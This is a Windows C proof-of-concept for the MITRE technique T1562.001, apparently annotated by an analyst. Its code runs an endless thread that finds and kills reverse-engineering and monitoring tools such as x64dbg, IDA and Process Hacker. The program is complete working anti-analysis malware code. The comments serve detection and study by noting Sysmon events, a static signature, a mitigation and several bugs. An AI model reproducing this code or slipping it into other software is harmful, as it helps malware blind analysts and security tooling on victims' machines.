T1562.001 - Impair Defenses: Disable or Modify Tools
/*
Author: wizardy0ga
Date: June 2024
Description: Spawns a thread that looks for & terminates processes that could be used for malware analysis
Tactic: TA0005 - Defense Evasion
Technique: T1562.001 - Impair Defenses: Disable or Modify Tools
Note: Nothing that hasn't been done before, just a bare-bones PoC I coded for another project.
*/
#include <windows.h> | |
#include <stdio.h> | |
#include <TlHelp32.h> | |
/* Processes to terminate if found */ | |
/*
 * Image names the worker thread terminates on sight.
 *
 * The entries are already lower case because TerminateAnalysisSoftware
 * lower-cases each snapshot entry and then does an exact lstrcmpW, so a
 * tool whose image name differs in any way is simply not matched.
 *
 * Analyst note: this literal table is the binary's most durable static
 * indicator - the wide strings survive compilation verbatim and are a
 * straightforward hunting/signature artefact. The array is declared as
 * non-const PWCHAR although it only ever points at string literals; it
 * is never written to.
 */
PWCHAR Processes[] = {
    L"processhacker.exe",
    L"ida64.exe",
    L"x64dbg.exe",
    L"apimonitor-x64.exe"
};
/*
 * Worker thread body: enumerates all running processes, over and over,
 * and terminates any whose lower-cased image name exactly equals an
 * entry of Processes[].
 *
 * Never returns. main() starts it through CreateThread with a cast, so
 * the (absent) LPVOID parameter and VOID return are a prototype mismatch
 * with LPTHREAD_START_ROUTINE that happens to work rather than being
 * well-defined.
 *
 * Analyst notes, all visible in the code below:
 *  - There is no delay anywhere in the loop, so the thread spins at full
 *    CPU, taking a fresh Toolhelp snapshot on every iteration.
 *  - Neither hSnapshot nor hProcess is ever passed to CloseHandle, so the
 *    host process's handle count climbs without bound. Sustained CPU plus
 *    a monotonically growing handle table are host-side symptoms.
 *  - Each match issues OpenProcess(PROCESS_TERMINATE) on the target. On
 *    hosts with process-access auditing (e.g. Sysmon Event ID 10, where
 *    PROCESS_TERMINATE shows up as GrantedAccess 0x1) that call is the
 *    cleanest detection point; the victim then exits with code 1 at the
 *    hands of an unrelated process.
 *  - OpenProcess fails silently for processes the caller cannot obtain
 *    PROCESS_TERMINATE on (higher-integrity or protected processes), which
 *    is the simplest mitigation against this particular loop.
 *  - Matching is by exact lower-cased image name only - no path, window
 *    title, module or signature checks.
 */
VOID TerminateAnalysisSoftware() {
    HANDLE hSnapshot = NULL,      /* Toolhelp snapshot; never closed */
           hProcess  = NULL;     /* PROCESS_TERMINATE handle; never closed */
    /* dwSize must be set before Process32First. This presumably relies on
     * UNICODE being defined so that PROCESSENTRY32 resolves to the W variant
     * (szExeFile is WCHAR[MAX_PATH]); the lstrlenW/lstrcmpW calls below would
     * not type-check against the ANSI struct - confirm the build settings. */
    PROCESSENTRY32 Process = { .dwSize = sizeof(PROCESSENTRY32) };
    /* Sized as if in bytes but declared as WCHAR elements, so this buffer
     * actually holds 2 * MAX_PATH characters. */
    WCHAR ProcNameLower [MAX_PATH * sizeof(WCHAR)];
    SIZE_T ProcNameSize = 0;
    while (TRUE) {
        /* Get a snapshot to all running processes on the system.
         * On failure, restart immediately with no back-off. */
        if (!(hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0))) { continue; }
        /* If the first entry cannot be read, the snapshot just taken is leaked. */
        if (!(Process32First(hSnapshot, &Process))) { continue; }
        do {
            /* Make sure process name & pid is not null.
             * szExeFile is an array, so the second operand is always true;
             * effectively this only skips PID 0. */
            if (Process.th32ProcessID && Process.szExeFile) {
                /* Convert process name to lower case.
                 * lstrlenW returns a character count; multiplying by sizeof(WCHAR)
                 * yields a byte count that is then used as a character index, so
                 * the copy loop walks 2 * len elements. Past index len it reads
                 * beyond the name's terminator inside szExeFile, and beyond
                 * szExeFile itself once the name exceeds MAX_PATH / 2 characters
                 * (out-of-bounds read, undefined behaviour). The comparison still
                 * works because towlower(L'\0') is 0, so ProcNameLower is
                 * NUL-terminated at index len. */
                ProcNameSize = lstrlenW(Process.szExeFile) * sizeof(WCHAR);
                memset(ProcNameLower, '\0', sizeof(ProcNameLower));
                int i = 0;
                /* int i compared against SIZE_T: signed/unsigned comparison. */
                for (; i < ProcNameSize; i++) { ProcNameLower[i] = towlower(Process.szExeFile[i]); }
                /* Writes a terminator at index 2 * len (already zero from the
                 * memset above); the post-increment value is never used. */
                ProcNameLower[i++] = '\0';
                /* Compare process name to names in array. terminate process if match is made.
                 * sizeof-based element count is valid here because Processes is a
                 * real array, not a pointer. */
                for (int j = 0; j < sizeof(Processes) / sizeof(PWCHAR); j++) {
                    if (lstrcmpW(ProcNameLower, Processes[j]) == 0) {
                        /* Assignment inside the condition; a failed OpenProcess
                         * (access denied, protected process, race with exit) is
                         * silently skipped and leaves no trace in the output. */
                        if (hProcess = OpenProcess(PROCESS_TERMINATE, FALSE, Process.th32ProcessID)) {
                            /* %S is the MSVC CRT spelling for a wide string in narrow printf.
                             * Printed before - and regardless of - the result of
                             * TerminateProcess, whose return value is not checked. */
                            printf("terminated %S\n", ProcNameLower);
                            TerminateProcess(hProcess, 1);   /* target exit code 1 */
                        }
                    }
                }
            }
        } while (Process32Next(hSnapshot, &Process));
        /* Snapshot exhausted; the outer loop immediately takes a new one. */
    }
}
/*
 * Entry point: starts TerminateAnalysisSoftware on its own thread and then
 * blocks on it forever.
 *
 * Because the worker never returns, WaitForSingleObject(INFINITE) never
 * completes and main() has no normal exit path - the console process stays
 * resident until it is killed externally. That persistent, CPU-bound console
 * process is itself a visible artefact on the host.
 *
 * Returns -1 only if the thread could not be created; the "return 0" below
 * is unreachable in practice.
 */
int main() {
    DWORD ThreadID = 0;
    HANDLE hThread = NULL;
    /* The cast papers over a prototype mismatch: TerminateAnalysisSoftware is
     * declared VOID with no parameters, while LPTHREAD_START_ROUTINE expects
     * DWORD WINAPI (LPVOID). No argument is passed (the 0 is the lpParameter). */
    hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)TerminateAnalysisSoftware, 0, 0, &ThreadID);
    if (!hThread) {
        printf("Failed to create thread\n"); return -1;
    }
    /* %d with a DWORD (unsigned long) is a format/argument mismatch; %lu would match. */
    printf("Created software termination thread at id %d\n", ThreadID);
    WaitForSingleObject(hThread, INFINITE);   /* worker never exits, so this never returns */
    return 0;
}